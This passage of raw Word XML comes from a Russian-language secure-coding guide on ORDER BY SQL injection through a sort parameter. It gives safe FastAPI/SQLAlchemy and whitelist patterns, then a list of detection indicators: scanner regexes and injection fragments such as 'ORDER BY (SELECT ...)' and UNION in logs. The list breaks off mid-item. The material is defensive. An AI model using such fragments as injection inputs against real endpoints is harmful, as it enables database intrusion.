    <w:p w14:paraId="1A57D83A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Как выглядит легитимное использование.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Sort-by-column — стандартный REST-pattern. Корректные шаблоны:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="370EE038" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t># Шаблон 1: Enum + ORM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50BC9232" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>from enum import Enum</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D415770" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>from sqlalchemy import select</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EC44444" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A7BEA26" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>class ProductSort(str, Enum):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ED2A0FB" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    name = "name"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4176633F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    price = "price"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75CA4C36" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    created_at = "created_at"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CDABC22" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    rating = "rating"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E7062C2" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5889706F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>@router.get("/products")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BAB48DD" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>async def list_products(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65170765" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    sort: ProductSort = Query(ProductSort.created_at),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F83A7FA" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    order: Literal["asc", "desc"] = Query("asc"),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38CFE615"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1ABA7951" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ECCC90D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    col = getattr(Product, sort.value)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1149F382" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    stmt = select(Product).where(Product.deleted_at.is_(None)) \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D0F7866" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        .order_by(col.asc() if order == "asc" else col.desc()) \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="358AC768" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        .limit(50)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2810BF45" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    result = await session.execute(stmt)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25866F6B"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result.scalars().all()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="316D1BF0" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">FastAPI Enum + </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Literal["asc", "desc"]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> делают валидацию на уровне routing: невалидный sort → HTTP 422 ещё до запроса в БД. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>getattr(Product, ...)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">гарантирует, что имя колонки берётся из модели (которая уже квалифицирована). SQLAlchemy ORM генерирует </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ORDER BY "products"."name" ASC</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — quoting автоматический.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41D58547" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t># Шаблон 2: Whitelist + quote_ident (для legacy / text-SQL)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3766CC63" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>import re</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DBBB266" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>from sqlalchemy import text</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24B7FB5A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41326EC2" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SORTABLE_COLUMNS = {"name", "price", "created_at", "rating"}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46CFD1C2" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DAECBAE" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>def safe_sort(sort: str) -&gt; str:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25C8A1A3" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    # ASCII-only + alpha/underscore + whitelist</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CEDB260" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    if not re.fullmatch(r"[a-z_][a-z0-9_]*", sort):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65E0BD47" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        return "created_at"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79CA33AB" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    if sort not in SORTABLE_COLUMNS:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D2D1005" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        return "created_at"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24CC750C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    return sort</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52B3100B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A7B6929" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>@router.get("/products")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B7E2AB4" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>async def list_products(sort: str = Query("created_at"), ...):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="223908F2" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    col = safe_sort(sort)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0118DF52" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    query = text(f'SELECT ... ORDER BY "{col}" ASC LIMIT 50')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="323BF121" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    # ↑ quoting через "" + safe_sort гарантия отсутствия quote-injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="409E5C80" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Признаки атаки:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="164F73DB" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Статический сканер</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: f-string или concat </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ORDER BY {var}</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> в SQL-builder без сопровождающего whitelist + quote_ident. В Python: regex </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ORDER BY \{\w+\}</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> или </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ORDER BY ['"]\s*\+\s*\w+</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="011C5029" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>`pg_stat_statements`</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: запросы </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ORDER BY name,...</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ORDER BY (SELECT ...)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ORDER BY name;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — нетипичные формы ORDER BY clause для конкретного эндпоинта.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="363BDFD4" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>HTTP access-log</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: query parameter </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>sort=</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> содержит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UNION</w:t>
      </w:r>
      <w:r>
        <w:t>, или Unicode-символы вне ASCII-range (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>%D0</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>%D1</w:t>
      </w:r>
      <w:r>
        <w:t>-prefix для Cyrillic).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3206A4EE" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
